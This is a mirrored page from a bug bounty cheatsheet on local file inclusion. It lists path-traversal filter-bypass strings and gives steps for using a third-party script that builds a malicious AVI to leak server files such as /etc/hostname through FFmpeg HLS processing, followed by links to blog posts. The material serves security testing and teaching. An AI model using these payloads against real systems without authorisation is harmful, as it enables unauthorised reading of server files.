mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-25 20:40:20 +00:00
1.4 KiB
1.4 KiB
LFI
Filter Bypass
../\
..\/
/..
\/..
/%5c..
FFmpeg Local File Disclosure
This script by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing HLS playlists.
Steps to reproduce
- Please download the script from @neex to your "attacker" instance
- Execute the script with your desired parameters:
python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi
- Upload the generated AVI file to your target site (e.g. within a 'video upload page')
- The target may process the malicious HLS inclusion with FFmpeg on the server-side.
- Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.
Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.
Blogs
- http://pastie.org/840199
- http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
- http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter
- http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
- http://www.digininja.org/blog/when_all_you_can_do_is_read.php